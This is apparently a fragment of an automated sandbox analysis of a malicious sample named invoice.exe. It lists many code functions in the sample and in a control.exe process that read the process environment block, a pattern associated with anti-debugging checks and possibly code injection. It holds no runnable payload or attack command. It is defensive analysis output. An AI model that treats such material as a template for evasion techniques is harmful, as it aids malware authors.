          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F53540 mov eax, dword ptr fs:[00000030h]1_2_00F53540
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F83D40 mov eax, dword ptr fs:[00000030h]1_2_00F83D40
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EF7D50 mov eax, dword ptr fs:[00000030h]1_2_00EF7D50
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9E539 mov eax, dword ptr fs:[00000030h]1_2_00F9E539
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F5A537 mov eax, dword ptr fs:[00000030h]1_2_00F5A537
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F04D3B mov eax, dword ptr fs:[00000030h]1_2_00F04D3B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F04D3B mov eax, dword ptr fs:[00000030h]1_2_00F04D3B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F04D3B mov eax, dword ptr fs:[00000030h]1_2_00F04D3B
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA8D34 mov eax, dword ptr fs:[00000030h]1_2_00FA8D34
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE3D34 mov eax, dword ptr fs:[00000030h]1_2_00EE3D34
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE3D34 mov eax, dword ptr fs:[00000030h]1_2_00EE3D34
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE3D34 mov eax, dword ptr fs:[00000030h]1_2_00EE3D34
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE3D34 mov eax, dword ptr fs:[00000030h]1_2_00EE3D34
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE3D34 mov eax, dword ptr fs:[00000030h]1_2_00EE3D34
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE3D34 mov eax, dword ptr fs:[00000030h]1_2_00EE3D34
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE3D34 mov eax, dword ptr fs:[00000030h]1_2_00EE3D34
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE3D34 mov eax, dword ptr fs:[00000030h]1_2_00EE3D34
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE3D34 mov eax, dword ptr fs:[00000030h]1_2_00EE3D34
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE3D34 mov eax, dword ptr fs:[00000030h]1_2_00EE3D34
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE3D34 mov eax, dword ptr fs:[00000030h]1_2_00EE3D34
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE3D34 mov eax, dword ptr fs:[00000030h]1_2_00EE3D34
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE3D34 mov eax, dword ptr fs:[00000030h]1_2_00EE3D34
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDAD30 mov eax, dword ptr fs:[00000030h]1_2_00EDAD30
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE76E2 mov eax, dword ptr fs:[00000030h]1_2_00EE76E2
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F016E0 mov ecx, dword ptr fs:[00000030h]1_2_00F016E0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA8ED6 mov eax, dword ptr fs:[00000030h]1_2_00FA8ED6
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F18EC7 mov eax, dword ptr fs:[00000030h]1_2_00F18EC7
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F8FEC0 mov eax, dword ptr fs:[00000030h]1_2_00F8FEC0
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F036CC mov eax, dword ptr fs:[00000030h]1_2_00F036CC
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F546A7 mov eax, dword ptr fs:[00000030h]1_2_00F546A7
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA0EA5 mov eax, dword ptr fs:[00000030h]1_2_00FA0EA5
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA0EA5 mov eax, dword ptr fs:[00000030h]1_2_00FA0EA5
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00FA0EA5 mov eax, dword ptr fs:[00000030h]1_2_00FA0EA5
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F6FE87 mov eax, dword ptr fs:[00000030h]1_2_00F6FE87
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE766D mov eax, dword ptr fs:[00000030h]1_2_00EE766D
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EFAE73 mov eax, dword ptr fs:[00000030h]1_2_00EFAE73
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EFAE73 mov eax, dword ptr fs:[00000030h]1_2_00EFAE73
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EFAE73 mov eax, dword ptr fs:[00000030h]1_2_00EFAE73
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EFAE73 mov eax, dword ptr fs:[00000030h]1_2_00EFAE73
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EFAE73 mov eax, dword ptr fs:[00000030h]1_2_00EFAE73
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE7E41 mov eax, dword ptr fs:[00000030h]1_2_00EE7E41
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE7E41 mov eax, dword ptr fs:[00000030h]1_2_00EE7E41
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE7E41 mov eax, dword ptr fs:[00000030h]1_2_00EE7E41
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE7E41 mov eax, dword ptr fs:[00000030h]1_2_00EE7E41
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE7E41 mov eax, dword ptr fs:[00000030h]1_2_00EE7E41
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE7E41 mov eax, dword ptr fs:[00000030h]1_2_00EE7E41
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9AE44 mov eax, dword ptr fs:[00000030h]1_2_00F9AE44
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F9AE44 mov eax, dword ptr fs:[00000030h]1_2_00F9AE44
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F8FE3F mov eax, dword ptr fs:[00000030h]1_2_00F8FE3F
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDE620 mov eax, dword ptr fs:[00000030h]1_2_00EDE620
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0A61C mov eax, dword ptr fs:[00000030h]1_2_00F0A61C
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F0A61C mov eax, dword ptr fs:[00000030h]1_2_00F0A61C
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDC600 mov eax, dword ptr fs:[00000030h]1_2_00EDC600
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDC600 mov eax, dword ptr fs:[00000030h]1_2_00EDC600
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EDC600 mov eax, dword ptr fs:[00000030h]1_2_00EDC600
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F08E00 mov eax, dword ptr fs:[00000030h]1_2_00F08E00
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F91608 mov eax, dword ptr fs:[00000030h]1_2_00F91608
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F137F5 mov eax, dword ptr fs:[00000030h]1_2_00F137F5
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F57794 mov eax, dword ptr fs:[00000030h]1_2_00F57794
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F57794 mov eax, dword ptr fs:[00000030h]1_2_00F57794
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00F57794 mov eax, dword ptr fs:[00000030h]1_2_00F57794
          Source: C:\Users\user\Desktop\invoice.exeCode function: 1_2_00EE8794 mov eax, dword ptr fs:[00000030h]1_2_00EE8794
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446A44B mov eax, dword ptr fs:[00000030h]6_2_0446A44B
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044CC450 mov eax, dword ptr fs:[00000030h]6_2_044CC450
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044CC450 mov eax, dword ptr fs:[00000030h]6_2_044CC450
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0445746D mov eax, dword ptr fs:[00000030h]6_2_0445746D
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B6C0A mov eax, dword ptr fs:[00000030h]6_2_044B6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B6C0A mov eax, dword ptr fs:[00000030h]6_2_044B6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B6C0A mov eax, dword ptr fs:[00000030h]6_2_044B6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B6C0A mov eax, dword ptr fs:[00000030h]6_2_044B6C0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1C06 mov eax, dword ptr fs:[00000030h]6_2_044F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1C06 mov eax, dword ptr fs:[00000030h]6_2_044F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1C06 mov eax, dword ptr fs:[00000030h]6_2_044F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1C06 mov eax, dword ptr fs:[00000030h]6_2_044F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1C06 mov eax, dword ptr fs:[00000030h]6_2_044F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1C06 mov eax, dword ptr fs:[00000030h]6_2_044F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1C06 mov eax, dword ptr fs:[00000030h]6_2_044F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1C06 mov eax, dword ptr fs:[00000030h]6_2_044F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1C06 mov eax, dword ptr fs:[00000030h]6_2_044F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1C06 mov eax, dword ptr fs:[00000030h]6_2_044F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1C06 mov eax, dword ptr fs:[00000030h]6_2_044F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1C06 mov eax, dword ptr fs:[00000030h]6_2_044F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1C06 mov eax, dword ptr fs:[00000030h]6_2_044F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1C06 mov eax, dword ptr fs:[00000030h]6_2_044F1C06
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0450740D mov eax, dword ptr fs:[00000030h]6_2_0450740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0450740D mov eax, dword ptr fs:[00000030h]6_2_0450740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0450740D mov eax, dword ptr fs:[00000030h]6_2_0450740D
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446BC2C mov eax, dword ptr fs:[00000030h]6_2_0446BC2C
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04508CD6 mov eax, dword ptr fs:[00000030h]6_2_04508CD6
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F14FB mov eax, dword ptr fs:[00000030h]6_2_044F14FB
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B6CF0 mov eax, dword ptr fs:[00000030h]6_2_044B6CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B6CF0 mov eax, dword ptr fs:[00000030h]6_2_044B6CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B6CF0 mov eax, dword ptr fs:[00000030h]6_2_044B6CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0444849B mov eax, dword ptr fs:[00000030h]6_2_0444849B
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04473D43 mov eax, dword ptr fs:[00000030h]6_2_04473D43
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B3540 mov eax, dword ptr fs:[00000030h]6_2_044B3540
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044E3D40 mov eax, dword ptr fs:[00000030h]6_2_044E3D40
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04457D50 mov eax, dword ptr fs:[00000030h]6_2_04457D50
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0445C577 mov eax, dword ptr fs:[00000030h]6_2_0445C577
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0445C577 mov eax, dword ptr fs:[00000030h]6_2_0445C577
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04508D34 mov eax, dword ptr fs:[00000030h]6_2_04508D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04443D34 mov eax, dword ptr fs:[00000030h]6_2_04443D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04443D34 mov eax, dword ptr fs:[00000030h]6_2_04443D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04443D34 mov eax, dword ptr fs:[00000030h]6_2_04443D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04443D34 mov eax, dword ptr fs:[00000030h]6_2_04443D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04443D34 mov eax, dword ptr fs:[00000030h]6_2_04443D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04443D34 mov eax, dword ptr fs:[00000030h]6_2_04443D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04443D34 mov eax, dword ptr fs:[00000030h]6_2_04443D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04443D34 mov eax, dword ptr fs:[00000030h]6_2_04443D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04443D34 mov eax, dword ptr fs:[00000030h]6_2_04443D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04443D34 mov eax, dword ptr fs:[00000030h]6_2_04443D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04443D34 mov eax, dword ptr fs:[00000030h]6_2_04443D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04443D34 mov eax, dword ptr fs:[00000030h]6_2_04443D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04443D34 mov eax, dword ptr fs:[00000030h]6_2_04443D34
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0443AD30 mov eax, dword ptr fs:[00000030h]6_2_0443AD30
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044FE539 mov eax, dword ptr fs:[00000030h]6_2_044FE539
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044BA537 mov eax, dword ptr fs:[00000030h]6_2_044BA537
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04464D3B mov eax, dword ptr fs:[00000030h]6_2_04464D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04464D3B mov eax, dword ptr fs:[00000030h]6_2_04464D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04464D3B mov eax, dword ptr fs:[00000030h]6_2_04464D3B
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B6DC9 mov eax, dword ptr fs:[00000030h]6_2_044B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B6DC9 mov eax, dword ptr fs:[00000030h]6_2_044B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B6DC9 mov eax, dword ptr fs:[00000030h]6_2_044B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B6DC9 mov ecx, dword ptr fs:[00000030h]6_2_044B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B6DC9 mov eax, dword ptr fs:[00000030h]6_2_044B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B6DC9 mov eax, dword ptr fs:[00000030h]6_2_044B6DC9
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0444D5E0 mov eax, dword ptr fs:[00000030h]6_2_0444D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0444D5E0 mov eax, dword ptr fs:[00000030h]6_2_0444D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044FFDE2 mov eax, dword ptr fs:[00000030h]6_2_044FFDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044FFDE2 mov eax, dword ptr fs:[00000030h]6_2_044FFDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044FFDE2 mov eax, dword ptr fs:[00000030h]6_2_044FFDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044FFDE2 mov eax, dword ptr fs:[00000030h]6_2_044FFDE2
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044E8DF1 mov eax, dword ptr fs:[00000030h]6_2_044E8DF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04462581 mov eax, dword ptr fs:[00000030h]6_2_04462581
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04462581 mov eax, dword ptr fs:[00000030h]6_2_04462581
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04462581 mov eax, dword ptr fs:[00000030h]6_2_04462581
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04462581 mov eax, dword ptr fs:[00000030h]6_2_04462581
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04432D8A mov eax, dword ptr fs:[00000030h]6_2_04432D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04432D8A mov eax, dword ptr fs:[00000030h]6_2_04432D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04432D8A mov eax, dword ptr fs:[00000030h]6_2_04432D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04432D8A mov eax, dword ptr fs:[00000030h]6_2_04432D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04432D8A mov eax, dword ptr fs:[00000030h]6_2_04432D8A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446FD9B mov eax, dword ptr fs:[00000030h]6_2_0446FD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446FD9B mov eax, dword ptr fs:[00000030h]6_2_0446FD9B
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044635A1 mov eax, dword ptr fs:[00000030h]6_2_044635A1
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04461DB5 mov eax, dword ptr fs:[00000030h]6_2_04461DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04461DB5 mov eax, dword ptr fs:[00000030h]6_2_04461DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04461DB5 mov eax, dword ptr fs:[00000030h]6_2_04461DB5
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_045005AC mov eax, dword ptr fs:[00000030h]6_2_045005AC
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_045005AC mov eax, dword ptr fs:[00000030h]6_2_045005AC
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04447E41 mov eax, dword ptr fs:[00000030h]6_2_04447E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04447E41 mov eax, dword ptr fs:[00000030h]6_2_04447E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04447E41 mov eax, dword ptr fs:[00000030h]6_2_04447E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04447E41 mov eax, dword ptr fs:[00000030h]6_2_04447E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04447E41 mov eax, dword ptr fs:[00000030h]6_2_04447E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04447E41 mov eax, dword ptr fs:[00000030h]6_2_04447E41
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044FAE44 mov eax, dword ptr fs:[00000030h]6_2_044FAE44
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044FAE44 mov eax, dword ptr fs:[00000030h]6_2_044FAE44
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0444766D mov eax, dword ptr fs:[00000030h]6_2_0444766D
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0445AE73 mov eax, dword ptr fs:[00000030h]6_2_0445AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0445AE73 mov eax, dword ptr fs:[00000030h]6_2_0445AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0445AE73 mov eax, dword ptr fs:[00000030h]6_2_0445AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0445AE73 mov eax, dword ptr fs:[00000030h]6_2_0445AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0445AE73 mov eax, dword ptr fs:[00000030h]6_2_0445AE73
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0443C600 mov eax, dword ptr fs:[00000030h]6_2_0443C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0443C600 mov eax, dword ptr fs:[00000030h]6_2_0443C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0443C600 mov eax, dword ptr fs:[00000030h]6_2_0443C600
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04468E00 mov eax, dword ptr fs:[00000030h]6_2_04468E00
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F1608 mov eax, dword ptr fs:[00000030h]6_2_044F1608
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446A61C mov eax, dword ptr fs:[00000030h]6_2_0446A61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446A61C mov eax, dword ptr fs:[00000030h]6_2_0446A61C
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0443E620 mov eax, dword ptr fs:[00000030h]6_2_0443E620
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044EFE3F mov eax, dword ptr fs:[00000030h]6_2_044EFE3F
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04478EC7 mov eax, dword ptr fs:[00000030h]6_2_04478EC7
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04508ED6 mov eax, dword ptr fs:[00000030h]6_2_04508ED6
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044636CC mov eax, dword ptr fs:[00000030h]6_2_044636CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044EFEC0 mov eax, dword ptr fs:[00000030h]6_2_044EFEC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044616E0 mov ecx, dword ptr fs:[00000030h]6_2_044616E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044476E2 mov eax, dword ptr fs:[00000030h]6_2_044476E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044CFE87 mov eax, dword ptr fs:[00000030h]6_2_044CFE87
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B46A7 mov eax, dword ptr fs:[00000030h]6_2_044B46A7
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04500EA5 mov eax, dword ptr fs:[00000030h]6_2_04500EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04500EA5 mov eax, dword ptr fs:[00000030h]6_2_04500EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04500EA5 mov eax, dword ptr fs:[00000030h]6_2_04500EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0444EF40 mov eax, dword ptr fs:[00000030h]6_2_0444EF40
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0444FF60 mov eax, dword ptr fs:[00000030h]6_2_0444FF60
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04508F6A mov eax, dword ptr fs:[00000030h]6_2_04508F6A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446A70E mov eax, dword ptr fs:[00000030h]6_2_0446A70E
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446A70E mov eax, dword ptr fs:[00000030h]6_2_0446A70E
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0445F716 mov eax, dword ptr fs:[00000030h]6_2_0445F716
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044CFF10 mov eax, dword ptr fs:[00000030h]6_2_044CFF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044CFF10 mov eax, dword ptr fs:[00000030h]6_2_044CFF10
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0450070D mov eax, dword ptr fs:[00000030h]6_2_0450070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0450070D mov eax, dword ptr fs:[00000030h]6_2_0450070D
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04434F2E mov eax, dword ptr fs:[00000030h]6_2_04434F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04434F2E mov eax, dword ptr fs:[00000030h]6_2_04434F2E
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446E730 mov eax, dword ptr fs:[00000030h]6_2_0446E730
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044737F5 mov eax, dword ptr fs:[00000030h]6_2_044737F5
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04448794 mov eax, dword ptr fs:[00000030h]6_2_04448794
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B7794 mov eax, dword ptr fs:[00000030h]6_2_044B7794
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B7794 mov eax, dword ptr fs:[00000030h]6_2_044B7794
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B7794 mov eax, dword ptr fs:[00000030h]6_2_044B7794
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04450050 mov eax, dword ptr fs:[00000030h]6_2_04450050
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04450050 mov eax, dword ptr fs:[00000030h]6_2_04450050
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04501074 mov eax, dword ptr fs:[00000030h]6_2_04501074
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044F2073 mov eax, dword ptr fs:[00000030h]6_2_044F2073
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04504015 mov eax, dword ptr fs:[00000030h]6_2_04504015
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04504015 mov eax, dword ptr fs:[00000030h]6_2_04504015
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B7016 mov eax, dword ptr fs:[00000030h]6_2_044B7016
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B7016 mov eax, dword ptr fs:[00000030h]6_2_044B7016
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044B7016 mov eax, dword ptr fs:[00000030h]6_2_044B7016
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446002D mov eax, dword ptr fs:[00000030h]6_2_0446002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446002D mov eax, dword ptr fs:[00000030h]6_2_0446002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446002D mov eax, dword ptr fs:[00000030h]6_2_0446002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446002D mov eax, dword ptr fs:[00000030h]6_2_0446002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0446002D mov eax, dword ptr fs:[00000030h]6_2_0446002D
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0444B02A mov eax, dword ptr fs:[00000030h]6_2_0444B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0444B02A mov eax, dword ptr fs:[00000030h]6_2_0444B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0444B02A mov eax, dword ptr fs:[00000030h]6_2_0444B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_0444B02A mov eax, dword ptr fs:[00000030h]6_2_0444B02A
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044CB8D0 mov eax, dword ptr fs:[00000030h]6_2_044CB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044CB8D0 mov ecx, dword ptr fs:[00000030h]6_2_044CB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044CB8D0 mov eax, dword ptr fs:[00000030h]6_2_044CB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044CB8D0 mov eax, dword ptr fs:[00000030h]6_2_044CB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044CB8D0 mov eax, dword ptr fs:[00000030h]6_2_044CB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044CB8D0 mov eax, dword ptr fs:[00000030h]6_2_044CB8D0
          Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_044340E1 mov eax, dword ptr fs:[00000030h]6_2_044340E1
